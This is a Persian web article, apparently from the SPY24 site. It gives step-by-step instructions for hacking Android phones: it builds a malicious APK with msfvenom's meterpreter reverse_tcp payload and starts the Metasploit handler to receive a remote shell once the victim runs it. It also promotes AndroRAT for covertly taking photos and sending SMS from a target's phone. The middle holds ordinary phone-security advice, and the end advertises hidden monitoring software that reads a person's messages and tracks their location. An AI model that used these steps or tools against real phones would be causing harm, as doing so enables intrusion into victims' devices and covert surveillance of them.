آموزش شناخت انواع هک و روش های مقابلهآیا اینستاگرام من هک شده است؟!امنیت سایبری (Cyber Security)بهترین برنامه های هک گوشی اندرویدی آیفونچگونه از هک شدن گوشی موبایلروش عالی برای ردیابی گوشیکنترل گوشی از راه دور برنامه برای کنترل اعضای خانوادههک آیفونهک تلگرام و نظارت بر عملکرد

راه و روش های نفوذ یا هک به اندروید در جهان تکنولوژی

راه و روش های نفوذ به اندروید در دنیای تکنولوژی متاسفانه از آنجایی که اندروید یک سیستم عامل متن باز می باشد، امکان هک و نفوذ به آن نیز زیاد است. این سیستم عامل به دلیل متن باز بودن امکانات کاملی را برای توسعه دهندگان برنامه ها و سیستم عامل ها فراهم می آورد.

سیستم عامل های متن باز معمولا دسترسی های بیشتری را برای کاربرانشان به وجود می آورند به همین دلیل بیشتر در معرض هک اندروید قرار می گیرد.

سیستم عامل اندروید نیز در خطر انواع بدافزارها، ویروس ها و برنامه های هک برای آن نوشته شده است.

امروز قصد داریم نکاتی را راجع به روش های هک اندروید و راه های نفوذ به این سیستم عامل را بررسی کرده و در اختیار علاقه مندان قرار دهیم.

هک اندروید چگونه امکان پذیر است ؟

در همین ابتدا، بدون اینکه بخواهیم شما را گیج کنیم، باید بگوییم تمام دستگاهای الکترونیکی قابل هک شدن هستند و دستگاه های اندرویدی نیز از این قاعده مستثنی نیستند.

روش های هک گوشی اندروید بسیار متنوع و زیاد است تا جایی که حتی افرادی که دانش چندانی در زمینه برنامه نویسی و هک ندارند، باز هم میتوانند گوشی های اندروید را با چند راهکار ساده هک کنند.

این دستگاهای اندرویدی مانند اکثر ابزارهای الکترونیکی قابلیت هک شدن را دارند اما روش های هک آن گوناگون بوده و هر کس با توجه به توانایی های خود می تواند یک روش خاص را انتخاب نماید.

هر روشی نیز به ابزاری خاص نیازمند است، که این ابزارها میزان دسترسی و کیفیت هک شما را مشخص می کنند.

شاخص ترین روش و ابزاری که یک هکر می تواند برای انجام هک اندروید از آن استفاده کند، یک سیستم کامپیوتری مجهز به سیستم عامل لینوکس می باشد که از نسخه کالی لینوکس یا بکترک استفاده کند. خبر بد برای دارندگان گوشی های اندروید این است که سیستم عامل اندروید نیز بر اساس هسته سیستم عامل لینوکس طراحی شده است و همین عامل سبب می شود پروسه هک اندروید بسیار ساده تر برای یک هکر حرفه ای صورت پذیرد.

هک اندروید با روشهای مختلف لینوکس برای اینکه بتوان  اقدام به هک اندروید کرد باید نسخه کالی لینوکس را روی سیستم خود داشته باشید.

پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کند.

با استفاده از این ابزار، هکر اقدام به ساخت یک برنامه هک اندروید به صورت APK می نماید.

برای ساخت چنین ابزاری هکر تنها نیاز دارد که دستور زیر را در محیط ترمینال لینوکس وارد نماید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در دستور فوق هکر به جای عبارت LHOST می تواند از آدرس آی پی خودش و در قسمت LPORT

از پورت اینترنت خودش استفاده کند. Name.apk نام ابزاری است

که هکر آن را می سازد تا با آن اقدام به هک اندروید نماید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

  • Msf>use exploit/multi/handler
  • Msf>set PAYLOAD android/meterpreter/reverse_tcp
  • Msf>set LHOST 192.168.1.35
  • Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کند.

این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند،

عملیات هک با کالی لینوکس موفقیت آمیز انجام می شود.

همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید نماید.

هک اندروید با برنامه های هک همانطور که گفتیم ابزارهایی که برای هک استفاده می کنید میزان دسترسی و کیفیت عمل هک را تعیین می کند.

دوره آموزشی آموزش تست نفوذ با اندروید
دوره آموزشی آموزش تست نفوذ با اندروید

یکی دیگر از ابزارهایی که بسیار مورد استفاده هکرها به خصوص هکرهایی با سواد کمتر در این زمینه قرار می گیرد، نرم افزارهای هک و نفوذ به اندروید می باشد.

این برنامه ها معمولا توسط هکرهای حرفه ای ساخته می شوند و هکرهای غیرحرفه ای و حتی افراد عادی نیز از آنها برای هک گوشی شخص موردنظرشان استفاده می کنند.

تعداد این برنامه ها آنقدر زیاد است که انسان در انتخاب یکی از آن ها ممکن است حتی گیج شود.

البته این نرم افزار ها برای اجرا و درست کار کردن نیازمند الزاماتی می باشند که بعضا به سادگی در اختیار همه قرار نمی گیرند.

در ادامه مطلب تعدای از نرم افزارهای هک را به اجمال معرفی خواهیم نمود.

هک اندروید با برنامه AndroRAT یکی از برنامه های معروف و پرطرفدار در این زمینه که تاکنون بسیار موفق عمل نموده است ، برنامه AndroRAT می باشد. نام این نرم افزار مخفف عبارت دسترسی از راه دور به دستگاه اندرویدی می باشد.

این برنامه به صورت رایگان در اختیار کاربرانش قرار گرفته است و امکان هک گوشی از راه دور را نیز به آنها می دهد، همچنین با استفاده از این برنامه می توان اقدام به ارسال Sms به وسیله گوشی قربانی نمود.

یکی از ویژگی هایی که باعث محبوبیت این برنامه شده است، قابلیت تصویر برداری با استفاده از دوربین گوشی هدف می باشد.

نرم افزار هک اندروید zANTI

بسیاری از نرم افزار ها هستند که به نرم افزارهای هک معروفند اما با هدف انجام تست نفوذ به سیستم طراحی و عرضه می شوند.

نرم افزار zanty نیز یکی از این نرم افزارهاست که به کارشناسان امنیت شبکه کمک می کند در سریعترین حالت ممکن اقدام به شناسایی نقاط ضعف شبکه نمایند.

این برنامه هک اندروید به برنامه Backtrack گوشی معروف می باشد، چرا که همچون سیستم عامل بک ترک لینوکس، ابزارهای مختلفی را در اختیار کاربران برای انجام عمل هک قرار می دهد و از طرفی قدرت فوق العاده ای نیز دارد.

برنامه های هک راه و روش های نفوذ به اندروید
برنامه های هک

به گزارش گروه SPY24 ، دنیای دیجیتال ما هر روزه ناامن‌تر از گذشته می‌شود، اخبار متعددی از هک شدن گوشی افراد مشهور، فاش شدن اطلاعات کاربران شبکه‌های مجازی، حتی نفوذ و رخنه به سیستم‌های امنیتی کشور‌ها بزرگ منتشر می‌شود که نگرانی کاربران از حفظ حریم شخصی خودشان را افزایش می‌دهد. اطلاعات خصوصی هر کاربری در معرض هک شدن قرار دارد و این موضوع تنها مختص به هنرمندان، افراد مشهور و اصطلاحاً سلبریتی‌ها نیست. بر اساس آمار‌ها مردم عادی بیش از دیگر اشخاص طعمه این گونه حمله‌های سایبری هستند.

نوع گوشی، سیستم عامل و یا برنامه‌های محافظ هر کاربر تا حدودی می‌تواند درصد هک شدن گوشی را افزایش یا کاهش دهد، اما حتی ایمن‌ترین سیستم‌عامل‌ها در جهان در معرض هک شدن قرار دارند. به تازگی خبر هک شدن گوشی جف بزوس، ثروتمندترین فرد در جهان و مالک شرکت آمازون و روزنامه واشنگتن‌پست منتشر شد. قطعاً وی از ویژگی‌های امنیتی پیشرفته‌ای بر روی گوشی هوشمند خود بهره می‌برد، اما حتی این موارد هم نتوانست به غیرقابل نفوذ شدن تلفن همراه بزوس، کمکی کند.

از این رو کاربران نگرانی‌های فراوانی برای دسترسی دیگران به اطلاعات شخصی خود دارند، تلفن هوشمند محل نگه داری بسیاری از اطلاعات خصوصی کاربران است که نیاز به محافظت دارد. راهکار‌هایی وجود دارد که خطر هک شدن گوشی را کاهش می‌دهد، به کارگیری این روش‌ها، هرچند تلفن هوشمند را به طور 100 درصد ایمن نمی‌کند، اما به مقدار قابل ملاحظه‌ای امنیت تلفن هوشمند و اطلاعات درون آن را افزایش می‌دهد. در این گزارش با ارائه این راه‌کارها، امید داریم تا بیش از گذشته، نفوذ هکر‌ها به گوشی کاربران و سرقت اطلاعات شخصی آن‌ها، گرفته شود. اگر به افزایش ایمنی گوشی خود علاقه دارید، با ادامه گزارش همراه ما باشید:

راه هک شدن تلفن‌های همراه چیست؟

تلفن هوشمند هر شخصی حاوی یک سری اطلاعات ارزشمند شخصی مانند شماره حساب، موجود بانکی، تعداد حساب‌های در گردش و مواردی از این دست است که برای هکر‌ها ارزشمند محسوب می‌شود. اما رسیدن به این اطلاعات راهکار‌هایی دارد، دو روش اصلی برای دستیابی به اطلاعات گوشی هر فرد شامل دزدی تلفن هوشمند و استفاده از بدافزار‌ها می‌شود.

دزدی فیزیکی گوشی هوشمند

دزدی فیزیکی گوشی، یکی از روش‌ها برای رسیدن به اطلاعات ارزشمند داخل آن است، البته هکر‌ها از این روش استفاده نمی‌کنند. سارقان نیز با وجود رمزعبور و شرایط سخت شکستن آن و همچنین سیستم‌های رمزنگاری شده گوشی که حتی با اتصال به دستگاه‌های دیگر، اطلاعات را فاش نمی‌سازند، کار دشواری دارند. به همین جهت سارقان بیشتر پس از دزدی با فروش گوشی پول دریافت می‌کنند و کمتر کسی از این روش برای نفوذ به اطلاعات گوشی بهره می‌برد. البته اگر گوشی شما رمزعبور نداشته باشد، با سرقت آن، دسترسی به تمامی اطلاعات بسیار آسان است.

هک گوشی با بدافزار‌ها

اما موردی که امروزه بیشتر مورد استفاده قرار می‌گیرد و ما نیز در این گزارش به دنبال مقابله با آن هستیم، هک گوشی به وسیله بدافزار‌های مخرب است. مجرمان سایبری ترجیح می‌دهند از راه دور به گوشی افراد نفوذ کرده و اطلاعات را سرقت کنند، با این روش هیچ ردپایی از هکر باقی نمی‌ماند. هکر‌ها به دو ضعف کاربران امید دارند و با همین امید کار خود را پیش می‌برند. یک آنکه کاربران اطلاعات زیادی از نحوه کار گوشی و محافظت از آن نداشته باشند که البته در این صورت طعمه خوبی برای هکر‌ها به شمار می‌روند. دوم آنکه با وجود دانش فنی، به هر دلیلی برای ایمنی گوشی خود اهمیتی قائل نشوند و تلاشی برای حفظ اطلاعات شخصی خود نداشته باشند. در هر دوحالت کار هکر‌ها برای نفوذ به گوشی کاربران بسیار آسان می‌شود.

البته زیاده‌روی در مبحث امنیت نیز زندگی کاربران را مختل می‌کند، استفاده از رمز‌های عبور طولانی و دشوار، استفاده از برنامه‌هایی برای ناشناس ماندن در وب‌گردی و استفاده از چند آنتی‌ویروس، مواردی نیست که ما به دنبال آن باشیم، اما با رعایت یکسری نکات و راهکار‌های نه‌چندان دشوار می‌توان راه نفوذ هکر‌ها به گوشی خود را مسدود کرد. اما این روش‌ها چیست؟

سیستم‌عامل و برنامه‌های خود را بروزرسانی کنید

دیدن اعلان بروزرسانی جدید برای سیستم عامل یا برنامه‌های گوشی برای کاربران یک مصیبت است، دید بسیار منفی به بروزرسانی‌ها وجود دارد و خیلی از کاربران برنامه‌های خود را به‌روز نمی‌کنند. استفاده از حجم اینترنت، دقایقی از دسترس خارج شدن برنامه برای بروزرسانی و تعداد زیاد بروزرسانی‌ها از جمله دلایلی هستند که کاربران را از نصب آن‌ها منصرف می‌سازد. اما باید گفت هیچ شرکت توسعه دهنده‌ای بی‌دلیل برای برنامه خود بروزرسانی ارسال نمی‌کند. اکثر آپدیت‌ها به موارد امنیتی بر می‌گردد و راه نفوذ به برنامه یا گوشی را می‌بندد. هکر‌ها برای یافتن باگ امنیتی در برنامه یا سیستم عامل‌ها باید ماه‌ها یا حتی سال‌ها وقت صرف کنند، این بروزرسانی‌ها با از بین بردن باگ‌ها امنیتی جدید و شناخته شده در برنامه، این راه‌های نفوذ را از بین می‌برد؛ بنابراین همواره برنامه‌ها و به خصوص سیستم عامل خود را به‌روز نگه‌دارید.

عدم نصب برنامه‌های مشکوک با دسترسی‌های غیرمعقول

روزانه برنامه‌های بسیاری به قصد نفوذ به گوشی کاربران و برای هر دو سیستم عامل اندروید و iOS تولید می‌شود. این اپلیکیشن‌ها معمولاً توسط گروه‌های توسعه دهنده نامعتبر ساخته می‌شوند و خدماتی عجب را ارائه می‌دهند. هدف این برنامه‌ها جذب کاربران با ارائه ویژگی‌های عجیب و تاحدودی باورنکردنی است، از همین طریق می‌توان این چنین برنامه‌های مشکوک را شناسایی کرد. به طور مثال برنامه‌ای برای گرفتن فشار خون، مشخص کردن دما محیط، اسکن رادیولوژی با دوربین گوشی یا برنامه‌های شرط‌بندی، به طور واضح این دست اپلیکیشن‌ها دروغین بوده و بسیار خطرناک هستند.

از طرفی حتی برخی برنامه‌های به ظاهر مفید و کاربردی، مجوز دسترسی‌های غیرمعقولی برای نصب درخواست می‌کنند، مثلاً برنامه ویرایش عکس دسترسی به مخاطبین و میکروفن گوشی را می‌خواهد، در صورتی که این دو دسترسی هیچ ارتباطی به ویرایش عکس ندارد. در این حالت نیز می‌توان برنامه‌های مشکوک و مخرب را شناسایی کرد. از نصب چنین اپلیکیشن‌هایی خودداری کنید.

همواره دسترسی برنامه‌ها به منابع گوشی را بعد از نصب نیز می‌توان تغییر داد؛ بنابراین بهتر است همین حالا، به منو تنظیمات و بخش برنامه‌ها نصب شده رفته و مجوز دسترسی‌های هر برنامه را بررسی کنید، در صورت صدور مجوز یک دسترسی نامعقول برای یک برنامه، آن مجوز را سریعاً غیرفعال کنید.

از یک رمز عبور امن و ترجیحاً قفل‌های بیومتریک استفاده کنید راه و روش های نفوذ به اندروید

اگر به هر دلیلی برروی گوشی خود قفل صفحه‌ای ندارید، به سرعت یک رمز عبور مناسب و منحصر‌به‌فرد را انتخاب کنید. این رمز نباید یک عدد ساده مانند 1234 یا تاریخ تولد و شماره شناسنامه شما باشد. این موارد به آسانی قابل پیش‌بینی هستند. از یک رمز عبور میان 6 تا 8 عدد استفاده کنید، ترجیحاً در رمز عبور از حروف و کاراکتر‌های دیگر نیز بهره ببرید. با این کار امنیت قفل چندین برابر می‌شود.

اما اگر گوشی شما از یک یا چند قفل بیومتریک پشتیبانی می‌کند، حتماً از آن استفاده کنید. Face ID و Touch ID مدت‌ها است که برای گوشی‌های آیفون عرضه شده و با ضریب اطمینان بالا، به راحتی قابل استفاده هستند. در مورد گوشی‌های اندرویدی قفل تشخیص چهره و اثر انگشت به عنوان قفل‌های بیومتریک شناخته می‌شوند. قفل تشخیص چهره به آسانی فریب می‌خورد و خیلی قابل اطمینان نیست، اما اگر گوشیتان دارای حسگر اثرانگشت است، به راحتی می‌توان به آن اطمینان کرده و از این قفل استفاده کرد.

به شبکه‌های وای‌فای ناشناخته متصل نشوید راه و روش های نفوذ به اندروید

در بسیاری از مکان‌های عمومی، وای‌فای رایگان ارائه می‌شود و این مورد بسیار وسوسه‌انگیز است. اما واقعیت آن است که اتصال به وای‌فای‌های عمومی رایگان، هرگز ایده خوبی نبوده و درصد ریسک این کار بسیار بالا است. مشخص نیست که ترافیک وای‌فای‌های عمومی از کجا تأمین می‌شود و به همین دلیل یکی از مشهورترین راه‌ها برای هک گوشی کاربران، وای‌فای عمومی است. بهتر است برای اتصال به اینترنت به جز وای‌فای خانگی خود، از دیتای موبایل استفاده نمایید، برای وای‌فای عمومی نیز اگر کاملاً به فرد یا شرکت ارائه دهنده آن مطمئن هستید، متصل شوید واگرنه از این کار پرهیز کنید.

ایمیل، لینک و فایل‌های مشکوک ارسالی را باز نکنید راه و روش های نفوذ به اندروید

یکی دیگر از محبوب‌ترین راه‌های هک گوشی کاربران حملات ملقب به فیشینگ است. در این نوع حمله، یک لینک، فایل، سند، تصویر یا حتی ویدئو توسط یک منبع با نامی آشنا برای کاربر ارسال می‌شود. با باز کردن آن لینک یا فایل، بدافزار‌های مخفی شده در آن وارد گوشی شما شده و عملیات هک اطلاعات شخصی آغاز می‌شود.

برای مقابله با این حملات باید به منبع فرستنده فایل مراجعه کرد، شماره‌های مشکوک و ناشناس یا آدرس‌های ایمیل غیر رسمی، معمولاً به حملات فیشینگ ارتباط دارند. بسیاری از ایمیل‌های ارسال شده برای کاربران دارای نام دروغین هستند، مثلاً یک ایمیل با نام یک سرویس دهنده پهنای باند اینترنتی مشهور برای شما ارسال می‌شود، اما باید به آدرس آن ایمیل نیز توجه کرد. بخش دیگری از پیام‌ها دارای تبلیغات غیرواقعی مانند تخفیف یک فروشگاه اینترنتی، حراجی فصل یا چنین مواردی هستند که کاربر را به بازکردن لینک تشویق می‌کند.

این روز‌ها باید به پیام‌های ارسالی در شبکه‌های اجتماعی و پیام‌رسان‌ها نیز توجه کرد، بسیاری با منسوخ شدن ارسال ایمیل، حملات خود را از پیام‌رسان‌ها انجام می‌دهند. تلفن هوشمند جف بزوس، مالک آمازون نیز با یک فایل ویدئویی که از طرف بن‌سلمان در واتس‌آپ برایش فرستاده شده بود، هک شد.

از ایستگاه‌های شارژ عمومی استفاده نکنید راه و روش های نفوذ به اندروید

بعضی مواقع 10 دقیق اتصال به شارژ می‌تواند تا ساعت‌ها کار ما را راه بیندازد. کمبود باتری گوشی مخصوصاً در مسافرت که دسترسی به برق محدود است، اتفاقی عادی محسوب می‌شود برای همین معمولاً در ایستگاه‌های قطار، فرودگاه‌ها، پایانه‌های اتوبوسرانی و مکان‌های عمومی پر رفت‌و‌آمد، ایستگاه‌های شارژ گوشی تعبیه می‌شود تا مردم استفاده نمایند.

هرچند اندروید و iOS هر دو در برابر اتصال‌های ناامن کابل شارژ مقاوم هستند، اما شما هرگز نمی‌دانید که هکر‌ها چه در سر دارند. ممکن است روشی جدید برای دسترسی به اطلاعات گوشی پیدا کرده باشند و آداپتور و کابل مخصوص خود را در میان کابل‌های ایستگاه شارژ قرار داده باشند. در مواردی که شارژ کمی دارید حتی بهتر است از شارژر‌های افراد ناشناس نیز استفاده نمایید. به همراه داشتن یک پاوربانک، بهترین راه حل است.

برنامه SPY24 :

در ابتدا امیدوارم که قوانین سایت spy24 را مطالعه کرده باشید.که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت spy24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد. در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

  • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
  • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
  • موقعیت لحظه مستمر و مسیر های پیموده شده
  • وب سایت های بازدید شده و برنامه های اجرا شده
  • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
  • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور

نرم افزار کنترل فرزندان spy24

برنامه های هک

برنامه های ردیابی گوشیبرنامه های هکبرنامه کنترلی SPY24بهترین راه برای نظارتبهترین نرم افزار کنترل و نظارت

keleis andre

برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا